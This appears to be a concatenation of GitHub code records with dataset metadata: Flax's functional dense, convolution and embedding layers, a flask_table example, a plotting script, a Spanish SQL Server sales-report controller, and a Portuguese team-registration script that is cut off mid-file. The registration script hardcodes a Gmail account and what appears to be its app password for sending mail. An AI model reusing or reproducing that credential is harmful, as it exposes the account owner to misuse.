List[str]\n :rtype: int\n \"\"\"\n length = len(tokens)\n res = [0]*length\n stack = []\n for i in range(length):\n while stack and tokens[stack[-1]] Class[blueprint]\nharry - -> harry ki info wala form - -> Object[entity]\ntom - -> tom ki info wala form - -> Object[entity]\nshubham - - shubham ki info wala form - -> Object[entity]\n# shubham.changeName(\"Shubhi\") '''\n","repo_name":"dassujan/100_DAYS_OF_PYTHON_CWH","sub_path":"56 Day56 - Intro to oops.py","file_name":"56 Day56 - Intro to oops.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74320532249","text":"from collections.abc import Iterable # pylint: disable=g-importing-member\nfrom flax import struct\nfrom flax.core import Scope\nfrom flax.linen import initializers\nfrom jax import lax\n\nimport jax.numpy as jnp\nimport numpy as np\n\n\ndefault_kernel_init = initializers.lecun_normal()\n\n\ndef _normalize_axes(axes, ndim):\n # A tuple by convention. len(axes_tuple) then also gives the rank efficiently.\n return tuple(ax if ax >= 0 else ndim + ax for ax in axes)\n\n\ndef dense_general(\n scope,\n inputs,\n features,\n axis=-1,\n batch_dims=(),\n bias=True,\n dtype=jnp.float32,\n kernel_init=default_kernel_init,\n bias_init=initializers.zeros_init(),\n precision=None,\n):\n \"\"\"Applies a linear transformation to the inputs along multiple dimensions.\n\n Args:\n inputs: The nd-array to be transformed.\n features: tuple with numbers of output features.\n axis: tuple with axes to apply the transformation on.\n batch_dims: tuple with batch axes.\n bias: whether to add a bias to the output (default: True).\n dtype: the dtype of the computation (default: float32).\n kernel_init: initializer function for the weight matrix.\n bias_init: initializer function for the bias.\n precision: numerical precision of the computation see `jax.lax.Precision`\n for details.\n Returns:\n The transformed input.\n \"\"\"\n inputs = jnp.asarray(inputs, dtype)\n\n if not isinstance(features, Iterable):\n features = (features,)\n if not isinstance(axis, Iterable):\n axis = (axis,)\n if not isinstance(batch_dims, Iterable):\n batch_dims = (batch_dims,)\n features, axis, batch_dims = tuple(features), tuple(axis), tuple(batch_dims)\n\n if batch_dims:\n max_dim = np.max(batch_dims)\n if set(batch_dims) != set(range(max_dim + 1)):\n raise ValueError(\n 'batch_dims %s must be consecutive leading '\n 'dimensions starting from 0.'\n % str(batch_dims)\n )\n\n ndim = inputs.ndim\n n_batch_dims = len(batch_dims)\n axis = _normalize_axes(axis, ndim)\n batch_dims = _normalize_axes(batch_dims, ndim)\n n_axis, n_features = len(axis), len(features)\n\n def kernel_init_wrap(rng, shape, dtype=jnp.float32):\n size_batch_dims = np.prod(shape[:n_batch_dims], dtype=np.int32)\n flat_shape = (\n np.prod(shape[n_batch_dims : n_axis + n_batch_dims]),\n np.prod(shape[-n_features:]),\n )\n kernel = jnp.concatenate(\n [kernel_init(rng, flat_shape, dtype) for _ in range(size_batch_dims)],\n axis=0,\n )\n return jnp.reshape(kernel, shape)\n\n batch_shape = tuple(inputs.shape[ax] for ax in batch_dims)\n kernel_shape = tuple(inputs.shape[ax] for ax in axis) + features\n kernel = scope.param('kernel', kernel_init_wrap, batch_shape + kernel_shape)\n kernel = jnp.asarray(kernel, dtype)\n\n batch_ind = tuple(range(n_batch_dims))\n contract_ind = tuple(range(n_batch_dims, n_axis + n_batch_dims))\n out = lax.dot_general(\n inputs,\n kernel,\n ((axis, contract_ind), (batch_dims, batch_ind)),\n precision=precision,\n )\n if bias:\n\n def bias_init_wrap(rng, shape, dtype=jnp.float32):\n size_batch_dims = np.prod(shape[:n_batch_dims], dtype=np.int32)\n flat_shape = (np.prod(shape[-n_features:]),)\n bias = jnp.concatenate(\n [bias_init(rng, flat_shape, dtype) for _ in range(size_batch_dims)],\n axis=0,\n )\n return jnp.reshape(bias, shape)\n\n bias = scope.param('bias', bias_init_wrap, batch_shape + features)\n\n # Reshape bias for broadcast.\n expand_dims = sorted(set(range(inputs.ndim)) - set(axis) - set(batch_dims))\n for ax in expand_dims:\n bias = jnp.expand_dims(bias, ax)\n bias = jnp.asarray(bias, dtype)\n out = out + bias\n return out\n\n\ndef dense(\n scope,\n inputs,\n features,\n bias=True,\n dtype=jnp.float32,\n precision=None,\n kernel_init=default_kernel_init,\n bias_init=initializers.zeros_init(),\n):\n \"\"\"Applies a linear transformation to the inputs along the last dimension.\n\n Args:\n inputs: The nd-array to be transformed.\n features: the number of output features.\n bias: whether to add a bias to the output (default: True).\n dtype: the dtype of the computation (default: float32).\n precision: numerical precision of the computation see `jax.lax.Precision`\n for details.\n kernel_init: initializer function for the weight matrix.\n bias_init: initializer function for the bias.\n Returns:\n The transformed input.\n \"\"\"\n inputs = jnp.asarray(inputs, dtype)\n kernel = scope.param('kernel', kernel_init, (inputs.shape[-1], features))\n kernel = jnp.asarray(kernel, dtype)\n y = lax.dot_general(\n inputs,\n kernel,\n (((inputs.ndim - 1,), (0,)), ((), ())),\n precision=precision,\n )\n if bias:\n bias = scope.param('bias', bias_init, (features,))\n bias = jnp.asarray(bias, dtype)\n y += jnp.reshape(bias, (1,) * (y.ndim - 1) + (-1,))\n return y\n\n\ndef _conv_dimension_numbers(input_shape):\n \"\"\"Computes the dimension numbers based on the input shape.\"\"\"\n ndim = len(input_shape)\n lhs_spec = (0, ndim - 1) + tuple(range(1, ndim - 1))\n rhs_spec = (ndim - 1, ndim - 2) + tuple(range(0, ndim - 2))\n out_spec = lhs_spec\n return lax.ConvDimensionNumbers(lhs_spec, rhs_spec, out_spec)\n\n\ndef conv(\n scope,\n inputs,\n features,\n kernel_size,\n strides=None,\n padding='SAME',\n input_dilation=None,\n kernel_dilation=None,\n feature_group_count=1,\n bias=True,\n dtype=jnp.float32,\n precision=None,\n kernel_init=default_kernel_init,\n bias_init=initializers.zeros_init(),\n):\n \"\"\"Applies a convolution to the inputs.\n\n Args:\n inputs: input data with dimensions (batch, spatial_dims..., features).\n features: number of convolution filters.\n kernel_size: shape of the convolutional kernel.\n strides: a sequence of `n` integers, representing the inter-window\n strides.\n padding: either the string `'SAME'`, the string `'VALID'`, or a sequence\n of `n` `(low, high)` integer pairs that give the padding to apply before\n and after each spatial dimension.\n input_dilation: `None`, or a sequence of `n` integers, giving the\n dilation factor to apply in each spatial dimension of `inputs`.\n Convolution with input dilation `d` is equivalent to transposed\n convolution with stride `d`.\n kernel_dilation: `None`, or a sequence of `n` integers, giving the\n dilation factor to apply in each spatial dimension of the convolution\n kernel. Convolution with kernel dilation is also known as 'atrous\n convolution'.\n feature_group_count: integer, default 1. If specified divides the input\n features into groups.\n bias: whether to add a bias to the output (default: True).\n dtype: the dtype of the computation (default: float32).\n precision: numerical precision of the computation see `jax.lax.Precision`\n for details.\n kernel_init: initializer for the convolutional kernel.\n bias_init: initializer for the bias.\n Returns:\n The convolved data.\n \"\"\"\n\n inputs = jnp.asarray(inputs, dtype)\n\n if strides is None:\n strides = (1,) * (inputs.ndim - 2)\n\n in_features = inputs.shape[-1]\n assert in_features % feature_group_count == 0\n kernel_shape = kernel_size + (in_features // feature_group_count, features)\n kernel = scope.param('kernel', kernel_init, kernel_shape)\n kernel = jnp.asarray(kernel, dtype)\n\n dimension_numbers = _conv_dimension_numbers(inputs.shape)\n y = lax.conv_general_dilated(\n inputs,\n kernel,\n strides,\n padding,\n lhs_dilation=input_dilation,\n rhs_dilation=kernel_dilation,\n dimension_numbers=dimension_numbers,\n feature_group_count=feature_group_count,\n precision=precision,\n )\n\n if bias:\n bias = scope.param('bias', bias_init, (features,))\n bias = jnp.asarray(bias, dtype)\n y += jnp.reshape(bias, (1,) * (y.ndim - 1) + (-1,))\n return y\n\n\ndef conv_transpose(\n scope,\n inputs,\n features,\n kernel_size,\n strides=None,\n padding='SAME',\n kernel_dilation=None,\n bias=True,\n dtype=jnp.float32,\n precision=None,\n kernel_init=default_kernel_init,\n bias_init=initializers.zeros_init(),\n):\n \"\"\"Applies a transposed convolution to the inputs. Behaviour mirrors that of\n `jax.lax.conv_transpose`.\n\n Args:\n scope: functional scope.\n inputs: input data with dimensions (batch, spatial_dims..., features).\n features: number of convolution filters.\n kernel_size: shape of the convolutional kernel.\n strides: a sequence of `n` integers, representing the inter-window\n strides.\n padding: either the string `'SAME'`, the string `'VALID'`, or a sequence\n of `n` `(low, high)` integer pairs that give the padding to apply before\n and after each spatial dimension.\n kernel_dilation: `None`, or a sequence of `n` integers, giving the\n dilation factor to apply in each spatial dimension of the convolution\n kernel. Convolution with kernel dilation is also known as 'atrous\n convolution'.\n bias: whether to add a bias to the output (default: True).\n dtype: the dtype of the computation (default: float32).\n precision: numerical precision of the computation see `jax.lax.Precision`\n for details.\n kernel_init: initializer for the convolutional kernel.\n bias_init: initializer for the bias.\n Returns:\n The convolved data.\n \"\"\"\n inputs = jnp.asarray(inputs, dtype)\n strides = strides or (1,) * (inputs.ndim - 2)\n\n in_features = inputs.shape[-1]\n kernel_shape = kernel_size + (in_features, features)\n kernel = scope.param('kernel', kernel_init, kernel_shape)\n kernel = jnp.asarray(kernel, dtype)\n\n y = lax.conv_transpose(\n inputs,\n kernel,\n strides,\n padding,\n rhs_dilation=kernel_dilation,\n precision=precision,\n )\n\n if bias:\n bias = scope.param('bias', bias_init, (features,))\n bias = jnp.asarray(bias, dtype)\n y += jnp.reshape(bias, (1,) * (y.ndim - 1) + (-1,))\n return y\n\n\ndefault_embed_init = initializers.variance_scaling(\n 1.0, 'fan_in', 'normal', out_axis=0\n)\n\n\n@struct.dataclass\nclass Embedding:\n table: np.ndarray\n\n def lookup(self, indices):\n \"\"\"Embeds the inputs along the last dimension.\n\n Args:\n indices: input data, all dimensions are considered batch dimensions.\n\n Returns:\n Output which is embedded input data. The output shape follows the input,\n with an additional `features` dimension appended.\n \"\"\"\n if indices.dtype not in [jnp.int32, jnp.int64, jnp.uint32, jnp.uint64]:\n raise ValueError('Input type must be an integer or unsigned integer.')\n return self.table[indices]\n\n def attend(self, query):\n \"\"\"Attend over the embedding using a query array.\n\n Args:\n query: array with last dimension equal the feature depth `features` of the\n embedding.\n\n Returns:\n An array with final dim `num_embeddings` corresponding to the batched\n inner-product of the array of query vectors against each embedding.\n Commonly used for weight-sharing between embeddings and logit transform\n in NLP models.\n \"\"\"\n return jnp.dot(query, self.table.T)\n\n\ndef embedding(\n scope: Scope, num_embeddings: int, features: int, init_fn=default_embed_init\n) -> Embedding:\n \"\"\"Creates embedding dataclass.\n\n Args:\n num_embeddings: number of embeddings.\n features: Number of feature dimensions for each embedding.\n embedding_init: embedding initializer.\n\n Returns:\n Embedding dataclass with lookup and attend methods.\n \"\"\"\n table = scope.param('table', init_fn, (num_embeddings, features))\n return Embedding(table) # type: ignore\n","repo_name":"google/flax","sub_path":"flax/core/nn/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":11599,"program_lang":"python","lang":"en","doc_type":"code","stars":4905,"dataset":"github-code","pt":"31"} +{"seq_id":"20110004980","text":"from flask_table import Table, Col, NestedTableCol\n\n\n\"\"\"Lets suppose that we have a class that we get an iterable of from\nsomewhere, such as a database. We can declare a table that pulls out\nthe relevant entries, escapes them and displays them. Additionally,\nwe show here how to used a NestedTableCol, by first defining a\nsub-table.\n\n\"\"\"\n\n\nclass SubItem(object):\n def __init__(self, col1, col2):\n self.col1 = col1\n self.col2 = col2\n\n\nclass Item(object):\n def __init__(self, name, description, subtable):\n self.name = name\n self.description = description\n self.subtable = subtable\n\n\nclass SubItemTable(Table):\n col1 = Col('Sub-column 1')\n col2 = Col('Sub-column 2')\n\n\nclass ItemTable(Table):\n name = Col('Name')\n description = Col('Description')\n subtable = NestedTableCol('Subtable', SubItemTable)\n\n\ndef main():\n items = [Item('Name1', 'Description1', [SubItem('r1sr1c1', 'r1sr1c2'),\n SubItem('r1sr2c1', 'r1sr2c2')]),\n Item('Name2', 'Description2', [SubItem('r2sr1c1', 'r2sr1c2'),\n SubItem('r2sr2c1', 'r2sr2c2')]),\n ]\n\n table = ItemTable(items)\n\n # or {{ table }} in jinja\n print(table.__html__())\n\n \"\"\"Outputs:\n\n \n \n \n \n \n \n \n \n
    NameDescriptionSubtable
    Name1Description1\n \n \n \n \n \n \n \n
    Sub-column 1Sub-column 2
    r1sr1c1r1sr1c2
    r1sr2c1r1sr2c2
    Name2Description2\n \n \n \n \n \n \n \n
    Sub-column 1Sub-column 2
    r2sr1c1r2sr1c2
    r2sr2c1r2sr2c2
    \n\n Except it doesn't bother to prettify the output.\n \"\"\"\n\nif __name__ == '__main__':\n main()\n","repo_name":"plumdog/flask_table","sub_path":"examples/simple_nested.py","file_name":"simple_nested.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"31"} +{"seq_id":"70767656408","text":"#!/usr/bin/python\n\n# import sys\n# sys.dont_write_bytecode = True;\n\n# library for ep.py\nimport epic as ep\nimport numpy as np\nimport sys\n\nargs = ep.parseCommandArgs() \n\n# color macro dictionary\nmc = {\"green\":\"#225522\", \"yellow\":\"#FFBB00\", \"red\":\"#BC434C\", \"purple\":\"#B82292\",\n \"blue\":\"#4455D2\", \"white\":\"#FFFFFF\", \"ddwhite\":\"#B3B3B3\", \"dwhite\":\"#DFDFDF\",\n \"gray\":\"#AAAAAA\", \"dgray\":\"#3F3F3F\", \"black\":\"#111111\"}\n\n# output file name\noutput = \"sc-bar.pdf\"\nif bool(args.outFile) == True:\n output = args.outFile\n\nif bool(args.inFile) == True:\n text = ep.tRead(args.inFile)\nelse:\n text = ep.tRead(\"../dat/sc-bar/c1.dat\")\n\nif bool(args.style) == True:\n style = args.style\n\n\n# parse ======================================================================\nPP = ep.PatternParser(text)\nPP.PickKeyWith(\"row\")\nPP.ParseWith(\"\\t\")\n\ndel PP.keyList[0]\n\n# Assign data: Cluster 1\nD1 = ep.Group(None, PP.getDataArr(0, opt=\"col\")[1:], color=mc[\"black\"], hatch=\"\")\nD2 = ep.Group(None, PP.getDataArr(1, opt=\"col\")[1:], color=mc[\"dwhite\"], hatch=\"\")\n\n# Assign data: Cluster 2\nD3 = ep.Group(None, PP.getDataArr(0, opt=\"col\")[1:], color=mc[\"black\"], hatch=\"\")\nD4 = ep.Group(None, PP.getDataArr(1, opt=\"col\")[1:], color=mc[\"dwhite\"], hatch=\"\")\n\nD1.setLegend(\"on-package bandwidth\")\nD2.setLegend(\"off-package bandwidth\")\n\n# set tick labels with data\nlabel = PP.getKeyArr()\nL1 = ep.TickLabel(None, label + label)\n\n# settings ===================================================================\nSBP = ep.SBarPlotter(title=\"Stacked Bar\", ylabel=\"Value\")\n\n# Set graph style\nSBP.setLegendStyle(ncol=5, size=10, frame=False, loc=\"upper center\")\nSBP.setFigureStyle(figmargin=0.05, barwidth=1, interMargin=0.5, bottomMargin=0.3)\n\n# draw =======================================================================\nSBP.setTicks(label=L1, angle=45)\nSBP.draw(D1, D2)\nSBP.setBaseOffset(1.7)\nSBP.draw(D3, D4)\nSBP.saveToPdf(output)\n","repo_name":"younghwanoh/ep-py","sub_path":"complex-examples/sc-bar.py","file_name":"sc-bar.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"17488567612","text":"from calendar import monthrange\nfrom tkinter import messagebox\nfrom Conexion import *\nfrom Archivos import *\nimport datetime\nimport decimal\nimport time\n\n\nclass CtrlConexion(): \n def __init__(self) -> None:\n self.__consulta='SELECT dbo.CHECKS.CheckNumber, dbo.CHECK_DETAIL.DetailPostingTime, dbo.MAJOR_GROUP.ObjectNumber AS Expr1, dbo.CHECK_DETAIL.ObjectNumber AS PPD, dbo.MENU_ITEM_DETAIL.DefSequenceNum, dbo.CHECK_DETAIL.SalesCount, dbo.CHECK_DETAIL.Total, dbo.CHECK_DETAIL.DetailType, dbo.CHECKS.AutoGratuity, dbo.CHECKS.Other, dbo.CHECKS.SubTotal FROM dbo.MENU_ITEM_DETAIL INNER JOIN dbo.MENU_ITEM_DEFINITION ON dbo.MENU_ITEM_DETAIL.MenuItemDefID = dbo.MENU_ITEM_DEFINITION.MenuItemDefID INNER JOIN dbo.MAJOR_GROUP INNER JOIN dbo.MENU_ITEM_MASTER ON dbo.MAJOR_GROUP.ObjectNumber = dbo.MENU_ITEM_MASTER.MajGrpObjNum ON dbo.MENU_ITEM_DEFINITION.MenuItemMasterID = dbo.MENU_ITEM_MASTER.MenuItemMasterID RIGHT OUTER JOIN dbo.CHECK_DETAIL INNER JOIN dbo.CHECKS ON dbo.CHECK_DETAIL.CheckID = dbo.CHECKS.CheckID ON dbo.MENU_ITEM_DETAIL.CheckDetailID = dbo.CHECK_DETAIL.CheckDetailID ORDER BY PPD'\n self.__hoy=datetime.datetime.now()\n self.__db=Conexion() \n self.cargar_Conexiones()\n #self.rutina() \n\n def cargar_Conexiones(self)->None:\n self.__conexiones=Archivos.traerConexiones()\n\n def actualizar_Conexiones(self,)->None:\n Archivos.guardarArchivo(self.__conexiones)\n \n def borrarConexion(self,ofiVent)->str:\n self.cargar_Conexiones()\n dat=self.buscarConexion(ofiVent)\n if dat!=None:\n for i in range(len(self.__conexiones)):\n if dat[0]==self.__conexiones[i][0]:\n self.__conexiones.pop(i)\n self.actualizar_Conexiones()\n return f\"Conexion '{dat[0]} de {dat[1]} Borrada' \"\n return 'No se pudo borrar'\n return 'Esta conexion no existe'\n\n def modificarConexion(self,ofiVent,nuevoSName,nuevaPropiedad)->str:\n self.cargar_Conexiones()\n dat=self.buscarConexion(ofiVent)\n if dat!=None:\n if self.probarConexion(nuevoSName):\n for i in range(len(self.__conexiones)):\n if dat[2]==self.__conexiones[i][2]:\n self.__conexiones[i]=[nuevoSName,nuevaPropiedad,ofiVent]\n self.actualizar_Conexiones()\n return f\"Modificado\" \n return \"No se pudo modificar\"\n return \"Esta nueva conexion no funciona\"\n return \"Esta conexion no existe\"\n \n def buscarConexion(self,sName,prop,ofi)->list:\n self.cargar_Conexiones()\n for i in self.__conexiones: \n if sName==i[0] or prop==i[1] or ofi==i[2]: \n return i\n return None\n\n def duplicados(self,server)->bool:\n self.cargar_Conexiones()\n for i in self.__conexiones:\n if server==i[0]:\n return False\n return True \n\n def nuevaConexion(self,server,propiedad,ofiVent)->str: \n if(self.duplicados(server)):\n if self.__db.conectar(server,propiedad,ofiVent):\n self.cargar_Conexiones()\n self.__conexiones.append([server,propiedad,ofiVent])\n self.actualizar_Conexiones()\n self.__db.cerrarConexion() \n return f\"Conexion exitosa con: {server} en {propiedad}\" \n else:\n return f\"Fallo conexion con: {server} en {propiedad}\"\n return f\"({server}) Esta conexion ya existe\"\n\n def probarConexion(self,server)->bool: \n return self.__db.conectar(server,'test conect','test conect') \n \n def consultar(self,sName,sentencia)->list:\n if self.probarConexion(sName):\n return self.__db.consulta(sentencia)\n return []\n \n def ordArchDia(self,sName,prop,ofi,repDia)->None:\n fFile=list()\n disc=list()\n print(f'----------------------{prop}----------------------------')\n datos=self.consultar(sName,self.__consulta)\n try: \n for i in range(len(datos)): \n if datos[i][7]==1 and datos[i][10]!=None:\n if (self.__hoy.day-datos[i][1].day==1 and datos[i][1].hour>=3) or (self.__hoy.day-datos[i][1].day==0 and datos[i][1].hour<3): fFile.append([datos[i][0],datos[i][1],datos[i][2],datos[i][3],datos[i][4],datos[i][5],datos[i][6],datos[i][7],datos[i][8],datos[i][9]]) \n elif self.__hoy.month>datos[i][1].month and datos[i][1].day==monthrange(self.__hoy.year,datos[i][1].month)[1]: fFile.append([datos[i][0],datos[i][1],datos[i][2],datos[i][3],datos[i][4],datos[i][5],datos[i][6],datos[i][7],datos[i][8],datos[i][9]])\n elif self.__hoy.year>datos[i][1].year and datos[i][1].day==monthrange(datos[i][1].year,datos[i][1].month)[1]: fFile.append([datos[i][0],datos[i][1],datos[i][2],datos[i][3],datos[i][4],datos[i][5],datos[i][6],datos[i][7],datos[i][8],datos[i][9]])\n if datos[i][7]==2: disc.append([datos[i][5],datos[i][6]])\n fFile=self.ordenarArchivo(fFile,disc,ofi)\n Archivos.escArchDia(fFile,prop,ofi,datos[i][1].strftime('%d-%m-%Y'))\n if repDia: Archivos.reportes(fFile,prop,ofi,datos[i][1].strftime('%d-%m-%Y %H:%M'))\n except Exception as e:\n messagebox.showerror(message=f'Error de conexion en {prop}:\\n Descripcion: {e}',title='ERROR')\n\n def ordenarArchivo(self,datos,disc,ofi)->list:\n desc=[0,0]\n dat=list()\n props=self.orgPropinas(datos,ofi)\n print('propinas')\n datos=self.totales(datos,list())\n print('totales')\n datos=self.delCeros(datos)\n print('quitar 0')\n for i in datos: dat.append(['Concepto','10','00','MST',i[2],ofi,str(i[4]),i[3],i[5],i[6]])\n dat=self.addConJer(dat)\n print('conceto jerarquias')\n dat=self.addConJerDev(dat)\n print('conjer dev')\n dat=self.addDefM(dat)\n print('MST')\n ico=self.addIco(dat,ofi)\n print('ICO')\n if len(props)>0: dat.append(props)\n for c in disc: \n if (c[0] and desc[0])!=None: desc[0]=desc[0]+c[0]\n if (c[1] and desc[1])!=None: desc[1]=desc[1]+c[1]\n if (desc[0] or desc[1])>0: dat.append(['0014',10,'00','','',ofi,'',3,desc[0],round(desc[1]*-1)])\n dat.append(ico)\n return dat\n\n def totales(self,datos,totales)->list:\n while len(datos)!=0:\n try: \n if datos[0][2]==datos[1][2] and datos[0][3]==datos[1][3] and datos[0][4]==datos[1][4]:\n datos[0][5]=datos[0][5]+datos[1][5]\n datos[0][6]=datos[0][6]+datos[1][6]\n datos.pop(1) \n else:\n datos[0][5]=datos[0][5]\n datos[0][6]=datos[0][6]/decimal.Decimal('1.08')\n totales.append(datos[0])\n datos.pop(0) \n except IndexError:\n datos[0][5]=datos[0][5]\n datos[0][6]=datos[0][6]/decimal.Decimal('1.08')\n totales.append(datos[0])\n return totales\n except TypeError: \n if datos[0][5]==None: datos.pop(0)\n elif datos[1][5]==None: datos.pop(1)\n elif datos[0][6]==None: datos.pop(0)\n elif datos[1][6]==None: datos.pop(1) \n return totales\n \n def delCeros(self,datos)->list: \n i=0\n while i0:\n print(c)\n datos[c][0]=aux[0]\n datos[c][4]=aux[1]\n c+=1\n return datos\n\n def addConJerDev(self,datos)->list:\n for i in range(len(datos)):\n if datos[i][7]<0 and datos[i][8]<0:\n aux=self.buscarConJerDev(datos[i][4]) \n datos[i][0]=aux[0]\n datos[i][4]=aux[1]\n datos[i][7]=datos[i][7]*-1\n datos[i][8]=datos[i][8]*-1\n return datos\n\n def addDefM(self,datos):\n for c in range(len(datos)):\n aux=self.buscarDefM(datos[c][5],datos[c][6])\n datos[c][3]=aux[0]\n datos[c][6]=aux[1]\n return datos\n\n def orgPropinas(self,datos,ofi)->list:\n sum=0 \n check=[]\n dat=[] \n for c in range(len(datos)):\n if datos[c][0] not in check: \n check.append(datos[c][0])\n dat.append(datos[c])\n for c in dat:\n if c[8]!=None: sum+=c[8]\n if c[9]!=None: sum+=c[9]\n if sum==0: return[]\n return ['0007',10,'00','','',ofi,'','','',round(sum)]\n\n def addIco(self,datos,ofi)->list:\n sum=0\n for c in datos:\n sum+=round(decimal.Decimal(str(c[9])))\n sum=round(sum*0.08)\n print(sum)\n return ['0005',10,'00','','',ofi,'','','',sum]\n\n def unoDiezReportes(self): \n try:\n for i in os.listdir('Consultas/'): \n datos=list() \n for j in os.listdir(f'Consultas/{i}'): \n f=os.path.join(f'Consultas/{i}/',j) \n if os.path.isfile(f) and j.endswith('.txt'): \n with open(f,'r') as txtfile:\n aux=txtfile.readlines() \n for k in aux:\n datos.append(k.replace('\\n','').split(';'))\n txtfile.close()\n aux2=self.buscarConexion('',i.split('-')[0],'')\n fecha=datetime.datetime.strptime(datos[len(datos)-1][1],'%d%m%Y %H:%M')\n fecha=fecha.strftime('%d%m%Y') \n Archivos.reportes(datos,aux2[1],aux2[2],fecha)\n except Exception as e:\n print(f'Error: {e}')\n\n def rutina(self):\n self.__hoy=datetime.datetime.now()\n for i in self.__conexiones:\n if self.__hoy.day<11: \n self.ordArchDia(i[0],i[1],i[2],True)\n elif self.__hoy.day==11: \n self.ordArchDia(i[0],i[1],i[2],False)\n self.unoDiezReportes()\n elif self.__hoy.day>11: \n self.ordArchDia(i[0],i[1],i[2],True)\n else:\n print('Error inesperado')\n\n def getConexiones(self)->list():\n self.cargar_Conexiones()\n return self.__conexiones\n\n \n \n \n ","repo_name":"DesarrolloZK/prueba-repo","sub_path":"CtrlConexion.py","file_name":"CtrlConexion.py","file_ext":"py","file_size_in_byte":11885,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71283081048","text":"import re\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\n#Admito ter simpatizado bastante com o try/except\n#Aqui as classes aluno e cap estão quase a mesma coisa, nada muito grande foi mudado\n#Mas houve mudanças\nclass Pessoa:\n def __init__(self, nome, email, num_matricula):\n self.nome = nome\n self.email = email\n self.num_matricula = num_matricula\nclass AlunoEquipe(Pessoa):\n def __init__(self, nome, email, num_matricula, curso, data_nascimento, num_camisa):\n super().__init__(nome, email, num_matricula)\n self.curso = curso\n self.data_nascimento = data_nascimento\n self.num_camisa = num_camisa\n def cadastrar_aluno(self, nome_aluno,curso_aluno, email_aluno, num_matricula_aluno, data_nascimento_aluno, num_camisa_aluno):\n #RAISE ERROR - EMAIL INVALIDO\n if not self._verificar_email(email_aluno):\n raise ValueError(\"O e-mail deve estar no formato do Gmail.\")\n #Este trecho chama o método _verificar_email\n #Este método recebe um email como argumento e verifica se ele atende a um padrão específico.\n #RAISE ERROR - NÚMERO DE MATRÍCULA INVÁLIDO\n if len(num_matricula_aluno) != 13:\n raise ValueError(\"O número de matrícula deve ter exatamente 13 dígitos.\")\n #Esse trecho verifica o comprimento da variável num_matricula_aluno.\n #O objetivo dessa verificação é garantir que a matrícula do aluno tenha exatamente 13 dígitos.\n\n with open(\"alunos_cadastrados.txt\", \"a\", encoding=\"utf-8\") as arquivo:\n arquivo.write(f\"Nome Completo: {nome_aluno}, Curso: {curso_aluno}, E-mail: {email_aluno}, Numero de Matricula: {num_matricula_aluno}, Data de Nascimento: {data_nascimento_aluno}, Número da camisa: {num_camisa_aluno}\\n\")\n \n #ESSA FUNÇÃO TRABLAHA EM CONJUNTO COM O RAISE ERROR - EMAIL INVALIDO.\n #_verificar_email verifica se o e-mail contém o domínio \"@gmail.com\" e a validação com raise é acionada se essa verificação falha. \n #Aqui, eu defini o método _verificar_email, que aceita como único argumento o email. \n #Esse método irá verificar se o endereço de e-mail está no formato do Gmail.\n @staticmethod\n def _verificar_email(email):\n \"\"\"Verifica se o e-mail é do Gmail.\"\"\"\n #Aqui, eu defini um padrão de expressão regular(regex)que vai ser usado para verificar o formato do e-mail.\n #O padrão [^@]+@gmail\\.com está procurando por e-mails que tenham o domínio gmail.com. \n pattern = r\"[^@]+@gmail\\.com\"\n #Esta linha vai verificar se o e-mail passado como argumento corresponde ao padrão definido anteriormente.\n return bool(re.match(pattern, email))\n\n#MESMO RAISE ERROR PARA CAPITAOEQUIPE\nclass CapitaoEquipe(Pessoa):\n def __init__(self, nome, email, num_matricula, curso, data_nascimento, num_camisa):\n super().__init__(nome, email, num_matricula)\n self.curso = curso\n self.data_nascimento = data_nascimento\n self.num_camisa = num_camisa\n\n def cadastrar_capitao(self, curso_capitao, nome_capitao, email_capitao, num_matricula_capitao, data_nascimento_capitao,num_camisa_capitao):\n if not self._verificar_email(email_capitao):\n raise ValueError(\"O e-mail deve estar no formato do Gmail.\")\n if len(num_matricula_capitao) != 13:\n raise ValueError(\"O número de matrícula deve ter exatamente 13 dígitos.\")\n with open(\"capitao_cadastro.txt\", \"a\", encoding=\"utf-8\") as arquivo:\n arquivo.write(f\"Curso: {curso_capitao}, Nome Completo: {nome_capitao}, E-mail: {email_capitao}, Número de Matrícula: {num_matricula_capitao}, Data de nascimento: {data_nascimento_capitao}, Número da camisa: {num_camisa_capitao}\\n\")\n lista_membros = SistemaDeCadastro.obter_lista_membros()\n #IMPLEMENTAÇÃO DE DICIONÁRIO PARA ARMAZENAR OS MEMBROS DA EQUIPE\n membros_por_curso = {}\n for membro in lista_membros:\n curso_membro = membro['Curso']\n if curso_membro == curso_capitao:\n if curso_membro not in membros_por_curso:\n membros_por_curso[curso_membro] = []\n membros_por_curso[curso_membro].append(membro)\n #IMPLEMENTAÇÃO DE LISTAS PARES PARA ARMAZENAR OS MEMBROS DA EQUIPE\n capitao = {\n \"Nome Completo\": nome_capitao,\n \"E-mail\": email_capitao,\n \"Número de Matrícula\": num_matricula_capitao,\n \"Data de Nascimento\": data_nascimento_capitao,\n \"Número da Camisa\": num_camisa_capitao}\n if curso_capitao in membros_por_curso:\n membros_por_curso[curso_capitao].append(capitao)\n else:\n membros_por_curso[curso_capitao] = [capitao] \n #IMPLEMENTAÇÃO DE LISTAS PARES PARA ARMAZENAR OS MEMBROS FORMATADOS DA EQUIPE\n lista_membros_formatada = []\n for curso, membros in membros_por_curso.items():\n membros_formatados = []\n for membro in membros:\n membro_str = f\"Nome Completo: {membro['Nome Completo']}, Curso: {curso}, E-mail: {membro['E-mail']}, Número de Matrícula: {membro['Número de Matrícula']}, Data de Nascimento: {membro['Data de Nascimento']}, Número da Camisa: {membro['Número da Camisa']}\"\n membros_formatados.append(membro_str)\n lista_membros_curso = \"\\n\".join(membros_formatados)\n lista_membros_formatada.append(lista_membros_curso)\n lista_membros_str = \"\\n\\n\".join(lista_membros_formatada)\n self.enviar_email_confirmacao(email_capitao, nome_capitao, lista_membros_str)\n def enviar_email_confirmacao(self, email_capitao, nome_capitao, lista_membros_str):\n email_remetente = email_capitao\n email_destinatario = \"projetoum8@gmail.com\"\n senha_destinatario = \"cswldlepklocmidl\"\n mensagem = MIMEMultipart()\n 